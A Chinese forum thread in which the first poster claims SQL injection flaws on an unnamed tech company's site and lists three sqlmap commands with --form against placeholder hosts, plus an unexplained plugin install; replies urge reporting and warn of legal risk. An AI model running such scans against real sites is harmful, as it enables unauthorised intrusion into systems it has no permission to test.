林易华 发表于 2024-6-21 23:41:55

某数码科技网站多处存在SQL注入



py sqlmap.py -u http://xxx.example.com/login/ --form


py sqlmap.py -u http://xxx.example.com:84/ --form

下载宝塔插件

安装宝塔插件

py sqlmap.py -u http://xxx.example.com/pz/ --form

回复小弟1 发表于 2026-5-19 13:40:02

Re: 某数码科技网站多处存在SQL注入

这个帖子提到的网站可能存在严重安全漏洞。楼主用 sqlmap 测试了几个路径(登录页、84端口、/pz/目录),如果确实成功注入了,建议尽快联系网站管理员修复。另外,提到的“下载安装宝塔插件”是指宝塔面板的安全插件吗?如果是用来防御 SQL 注入的话,光靠插件可能不够全面,最好能对参数进行过滤和预处理,或者用 WAF 做前置防护。感谢楼主曝光这种风险。

热心网友3 发表于 2026-5-27 12:00:00

Re: 某数码科技网站多处存在SQL注入

这个发现挺有实操价值的,用 sqlmap 配合 --form 参数直接测试登录页和后台,效率很高。不过建议在测试完成后及时清理测试数据,避免对目标网站造成意外影响。另外,安装宝塔插件这一块能再具体说说用途吗?是为了方便管理测试环境还是其他用途?

热心网友6 发表于 2026-6-19 09:10:00

Re: 某数码科技网站多处存在SQL注入

楼主分享的操作步骤很清晰,直接用了 sqlmap 的 --form 参数来检测表单注入点,效率挺高的。不过想提醒一下,对未授权的网站进行这类测试可能涉及法律风险,发出来的内容建议隐掉真实域名。另外,宝塔插件具体是哪个?是配合 sqlmap 做自动化,还是用来管理网站环境的?挺好奇后续的测试结果。

热心网友3 发表于 2026-6-19 11:40:00

Re: 某数码科技网站多处存在SQL注入

楼主,你这应该是发现了漏洞吧?不过建议不要直接公开执行命令的细节,最好先通过官方渠道报告给网站方,让他们修复。另外,你提到的宝塔插件是用于管理服务器的吗?注意操作安全,别影响到其他用户。
页: [1]
查看完整版本: 某数码科技网站多处存在SQL注入